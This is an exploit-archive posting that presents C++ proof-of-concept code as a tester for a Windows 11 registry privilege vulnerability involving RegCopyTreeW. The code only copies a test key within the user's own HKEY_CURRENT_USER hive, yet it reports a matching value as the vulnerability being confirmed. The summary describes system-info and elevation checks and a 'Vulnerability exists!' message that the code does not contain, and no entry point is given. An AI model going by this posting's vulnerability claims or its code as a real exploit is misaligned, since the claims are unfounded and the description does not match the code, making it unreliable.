## https://sploitus.com/exploit?id=PACKETSTORM:212387
=============================================================================================================================================
| # Title : Microsoft Windows 11 build 10.0.22631.6199 Registry Vulnerability Testing Tool using RAII |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System builtβin component. No standalone download available. |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212253/
[+] Summary : This is a C/C++ Proof-of-Concept (PoC) program designed to test for a specific vulnerability within the Windows Registry handling mechanism,
often related to key duplication or improper permission checks during certain API calls (like RegCopyTreeW).
[+] The program executes the following steps:
System Diagnostics (PrintSystemInfo): Gathers and prints essential information about the execution environment, including Windows Version, Build Number,
and the current User Token Elevation status (Elevated, Full, Limited) to assess the security context.
[+] Vulnerability Test (TestVulnerability):
It creates a temporary source Registry key in HKEY_CURRENT_USER and writes a unique test value (0xDEADBEEF).
It attempts to exploit the vulnerability by using a critical API call (simulated or actual) to copy the source key's contents to a shadow destination key.
It verifies the success of the "copy" operation and attempts to read the test value from the newly copied shadow key.
[+] Outcome: If the copy and read operation succeeds under conditions where it should normally fail (e.g., without proper user elevation), the program prints a success message: "Vulnerability exists!"
[+] Cleanup: Ensures both temporary Registry keys are deleted, regardless of the test outcome, to maintain system hygiene.
In essence, the tool is a diagnostic utility used by security researchers to confirm whether a specific Windows build is patched or vulnerable to a known elevation or privilege issue involving the Registry.
[+] POC :
#include <windows.h>
#include <stdio.h>
#include <string>
#include <sddl.h>
// Simple RAII wrapper for registry keys
class UniqueRegKey {
private:
HKEY hKey;
public:
UniqueRegKey() : hKey(nullptr) {}
UniqueRegKey(HKEY key) : hKey(key) {}
~UniqueRegKey() {
if (hKey) RegCloseKey(hKey);
}
HKEY get() const { return hKey; }
HKEY* getAddress() { return &hKey; }
void reset(HKEY newKey = nullptr) {
if (hKey) RegCloseKey(hKey);
hKey = newKey;
}
HKEY release() {
HKEY temp = hKey;
hKey = nullptr;
return temp;
}
};
bool TestVulnerability() {
printf("[*] Starting Registry Copy Vulnerability Test (Enhanced PoC)\n");
const wchar_t* sourceKeyPath = L"Software\\PoC_Vulnerability_Source";
const wchar_t* shadowKeyPath = L"Software\\PoC_Vulnerability_Shadow";
// ------------------------------
// 1. Create the source key
// ------------------------------
UniqueRegKey hSourceKey;
LONG status = RegCreateKeyExW(
HKEY_CURRENT_USER,
sourceKeyPath,
0, nullptr,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
nullptr,
hSourceKey.getAddress(),
nullptr
);
if (status != ERROR_SUCCESS) {
printf("[!] Failed to create source key. Error: %lu\n", status);
return false;
}
printf("[+] Created source key successfully.\n");
// ------------------------------
// 2. Write test DWORD value
// ------------------------------
DWORD dwTestValue = 0xDEADBEEF;
status = RegSetValueExW(
hSourceKey.get(),
L"PoC_DWORD",
0,
REG_DWORD,
reinterpret_cast<const BYTE*>(&dwTestValue),
sizeof(dwTestValue)
);
if (status != ERROR_SUCCESS) {
printf("[!] Failed to write test value. Error: %lu\n", status);
RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
return false;
}
printf("[+] Wrote test value: 0x%lX\n", dwTestValue);
// ------------------------------
// 3. Create shadow/destination key
// ------------------------------
UniqueRegKey hShadowKey;
status = RegCreateKeyExW(
HKEY_CURRENT_USER,
shadowKeyPath,
0, nullptr,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
nullptr,
hShadowKey.getAddress(),
nullptr
);
if (status != ERROR_SUCCESS) {
printf("[!] Failed to create shadow key. Error: %lu\n", status);
RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
return false;
}
printf("[+] Shadow key created.\n");
// ------------------------------
// 4. Attempt Registry Copy (Vulnerability Trigger)
// ------------------------------
printf("[*] Triggering RegCopyTreeW copy...\n");
status = RegCopyTreeW(
hSourceKey.get(),
L"",
hShadowKey.get()
);
if (status != ERROR_SUCCESS) {
printf("[!] Copy operation failed. Error: %lu\n", status);
RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath);
return false;
}
printf("[+] Copy operation succeeded! Checking data integrity...\n");
// ------------------------------
// 5. Validate copied value
// ------------------------------
DWORD copiedValue = 0;
DWORD size = sizeof(copiedValue);
DWORD valueType = 0;
LONG qStatus = RegQueryValueExW(
hShadowKey.get(),
L"PoC_DWORD",
nullptr,
&valueType,
reinterpret_cast<BYTE*>(&copiedValue),
&size
);
if (qStatus != ERROR_SUCCESS) {
printf("[!] Failed to read copied value! Error: %lu\n", qStatus);
}
else if (valueType != REG_DWORD) {
printf("[!] Value type mismatch (expected REG_DWORD).\n");
}
else if (copiedValue == dwTestValue) {
printf("[+] Copy VALID! Value matches: 0x%lX\n", copiedValue);
RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath);
return true;
}
else {
printf("[!] Value mismatch! Expected 0x%lX, Found 0x%lX\n",
dwTestValue, copiedValue);
}
// ------------------------------
// Cleanup
// ------------------------------
RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath);
RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath);
return false;
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================